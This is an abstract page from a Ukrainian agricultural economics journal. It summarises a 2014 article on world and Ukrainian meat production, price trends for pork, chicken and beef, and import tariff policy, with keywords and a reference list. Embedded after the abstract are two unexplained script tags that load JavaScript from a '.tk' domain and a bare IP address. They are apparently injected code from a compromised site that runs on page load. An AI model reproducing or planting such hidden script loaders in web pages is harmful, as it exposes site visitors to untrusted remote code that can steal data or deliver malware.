ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 338.439.5(4):54(477)
Зарубіжний досвід розвитку аграрного виробництва

Виробництво м’ясопродуктів: світові та вітчизняні тенденції / Скрипник А.В., Родина М. А. // Економіка АПК. - 2014. - № 3 - С. 93

Розглянуто виробництво м'ясної продукції в Україні та світі. Проаналізовано вплив світового ринку м'ясної продукції на вітчизняний. Введено поняття світової ціни на конкретний тип м'ясної продукції як середньозваженої ціни 20 провідних світових експортерів досліджуваної продукції. Для оцінки стабільності цього показника аналогічним чином введено поняття дисперсії ціни на заданий вид продукції. Описано тенденції українського та світового ринку м'ясопродуктів. За допомогою моделі експоненціального тренду оцінено середньорічні темпи зростання цін і обсягів виробництва. Показано, що найближчим часом світове виробництво курятини перевищить виробництво свинини. Зроблено порівняння світових і вітчизняних цін на такі товарні позиції, як свинина, курятина, яловичина. Показано, що маржа цін світового і внутрішнього ринків зберігається для яловичини, водночас рівень внутрішніх цін на свинину вже досяг рівня цін світового ринку, а для курятини внутрішні ціни перевищують світові. На основі порівняння рівнів цін світового та внутрішнього ринків зроблено висновок про необхідність внесення змін до тарифного регулювання імпорту м'ясної продукції. Табл.: 1. Рис.: 5. Бібліогр.: 13.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: виробництво м’ясної продукції, світові ціни, ринок м’яса, тарифний захист, регулювання імпорту, виробництво

Список використаних джерел

 1. Ukrainian Agrarian Economic Sector (Position and Development Tendency) under reduction М.V. Zubets, P.T. Sabluk, V.Ia. Мessel-Veseliak, М.М. Phedorov. – К.: NNC ІАЕ, 2011. – 1008 p.
 2. Agroindustrial Portal http://agroprom-ua.com/article/460.
 3. Institute of Current Situation of Agrarian Market. http://ikar.ru/lenta/437.html.
 4. Kalinchik N.V. Development and Effective Functioning of Enterprises at the Beef Market // Kalinchik N.V., Saenko О.А., Rossoha V.М.- К.:NNC IАЕ, 2009. – 212 p.
 5. Kozak L.V. Market Positions of Native Agrarian Producers in Context of Ukraine’s Membership in WTO // Economic of Agroindustrial Complex. – 2013. – №1. – P. 55-60.
 6. Mazurenko О.V. Food-security and Situation from Position of Meat Production and Consumption / О.V. Mazurenko // Scientific Messenger of Umanj’s National University of gardening. – 2008. – №. 70 (part 2 – Economic). – P. 105-111.
 7. Nakai О.А. Modern Position and Functioning Problems of Meat Market in Ukraine. // nbuv.gov.ua.
 8. Project of Law «About the Food Security». Verkhovna Rada Ukrayiny. Оfficial web-portal. http://w1.c1.rada.gov.ua/pls/zweb2/webproc4_1?pf3511=44744.
 9. Iatsenko O.M. Competitivness of agrarian sector in conditions of food market globalization // Economic of Agroindustrial Complex. – 2013. – №1. – P. 31-38.
 10. Anthony N. Rezitis, Maria Sassi. Commodity Food Prices: Review and Empirics // Hindawi Publishing Corporation. Economics Research International. Volume 2013, Article ID 694507, 15 pages. http://dx.doi.org/10.1155/2013/.
 11. Food and Agriculture Organization of the United Nations http://faostat.fao.org/.
 12. Report Linker. http://www.reportlinker.com/ci02026/Meat-and-Poultry.html.
 13. World Watch Institute. Vision for a Sustainable World http://www.worldwatch.org/global-meat-production-and-consumption-slow-down.
Читати статтю: 14_03_93-100.pdf